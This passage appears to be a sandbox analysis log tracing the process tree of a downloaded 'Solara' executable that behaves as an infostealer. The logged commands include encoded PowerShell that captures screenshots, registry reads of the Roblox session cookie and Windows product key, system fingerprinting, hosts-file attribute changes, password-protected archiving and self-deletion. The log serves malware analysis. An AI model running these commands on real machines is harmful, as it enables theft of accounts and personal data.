      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5720
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tdujtlce\tdujtlce.cmdline"
        6⤵
        
        PID:5436
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES53EF.tmp" "c:\Users\Admin\AppData\Local\Temp\tdujtlce\CSC54E60C204B0F436C819E4F1867AFA82A.TMP"
        7⤵
        
        PID:1940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:3168
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3784
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:6084
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:1224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3764
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5596
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5612
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1904
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:580
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3568"
      4⤵
      PID:5812
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3568
        5⤵
        Kills process with taskkill
        
        PID:5844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4252"
      4⤵
      PID:1468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4252
        5⤵
        Kills process with taskkill
        
        PID:6116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4252"
      4⤵
      PID:1992
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4252
        5⤵
        Kills process with taskkill
        
        PID:5112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4800"
      4⤵
      PID:4788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4800
        5⤵
        Kills process with taskkill
        
        PID:2984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3568"
      4⤵
      PID:3192
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3568
        5⤵
        Kills process with taskkill
        
        PID:5184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2620"
      4⤵
      PID:3220
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2620
        5⤵
        Kills process with taskkill
        
        PID:4952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4800"
      4⤵
      PID:6124
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4800
        5⤵
        Kills process with taskkill
        
        PID:4724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 552"
      4⤵
      PID:584
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 552
        5⤵
        Kills process with taskkill
        
        PID:4868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2620"
      4⤵
      PID:5900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2620
        5⤵
        Kills process with taskkill
        
        PID:5448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1084"
      4⤵
      PID:1824
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1084
        5⤵
        Kills process with taskkill
        
        PID:5188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 552"
      4⤵
      PID:5032
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 552
        5⤵
        Kills process with taskkill
        
        PID:5720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4508"
      4⤵
      PID:5852
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4508
        5⤵
        Kills process with taskkill
        
        PID:5356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1084"
      4⤵
      PID:5980
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1084
        5⤵
        Kills process with taskkill
        
        PID:2332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3352"
      4⤵
      PID:6012
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3352
        5⤵
        Kills process with taskkill
        
        PID:4584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4508"
      4⤵
      PID:1508
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4508
        5⤵
        Kills process with taskkill
        
        PID:2496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3348"
      4⤵
      PID:2088
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3348
        5⤵
        Kills process with taskkill
        
        PID:5592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3352"
      4⤵
      PID:5788
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3352
        5⤵
        Kills process with taskkill
        
        PID:4844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 692"
      4⤵
      PID:2660
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 692
        5⤵
        Kills process with taskkill
        
        PID:4704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3348"
      4⤵
      PID:4924
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3348
        5⤵
        Kills process with taskkill
        
        PID:1432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3460"
      4⤵
      PID:1768
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3460
        5⤵
        Kills process with taskkill
        
        PID:5432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 692"
      4⤵
      PID:5308
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 692
        5⤵
        Kills process with taskkill
        
        PID:580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3212"
      4⤵
      PID:4232
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3212
        5⤵
        Kills process with taskkill
        
        PID:5940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3460"
      4⤵
      PID:5248
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3460
        5⤵
        Kills process with taskkill
        
        PID:3704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3364"
      4⤵
      PID:2300
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3364
        5⤵
        Kills process with taskkill
        
        PID:5464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3212"
      4⤵
      PID:2820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3212
        5⤵
        Kills process with taskkill
        
        PID:1216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3364"
      4⤵
      PID:4656
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3364
        5⤵
        Kills process with taskkill
        
        PID:4940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:2084
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:280
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56602\rar.exe a -r -hp"ilovegrave" "C:\Users\Admin\AppData\Local\Temp\eQ5Ty.zip" *"
      4⤵
      PID:5888
    - - C:\Users\Admin\AppData\Local\Temp\_MEI56602\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI56602\rar.exe a -r -hp"ilovegrave" "C:\Users\Admin\AppData\Local\Temp\eQ5Ty.zip" *
        5⤵
        Executes dropped EXE
        
        PID:1468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:6084
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1508
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:6028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6100
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:4844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5472
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:5408
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6124
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:5320
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3220
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Downloads\SolaraB.exe""
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:1584
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6076

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5052

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3852

C:\Users\Admin\Downloads\Solara\Solara\Solara.exe
"C:\Users\Admin\Downloads\Solara\Solara\Solara.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4028
- C:\Users\Admin\Downloads\Solara\Solara\Solara.exe
  "C:\Users\Admin\Downloads\Solara\Solara\Solara.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1904
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 480
    3⤵
    - Program crash
    PID:2936
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 472
    3⤵
    - Program crash
    PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1904 -ip 1904
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1904 -ip 1904
1⤵
PID:2864

C:\Users\Admin\Downloads\Solara\Solara\Solara.exe
"C:\Users\Admin\Downloads\Solara\Solara\Solara.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3376
- C:\Users\Admin\Downloads\Solara\Solara\Solara.exe
  "C:\Users\Admin\Downloads\Solara\Solara\Solara.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4824
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 440
    3⤵
    - Program crash
    PID:1156
- - C:\Windows\SysWOW64\WerFault.exe
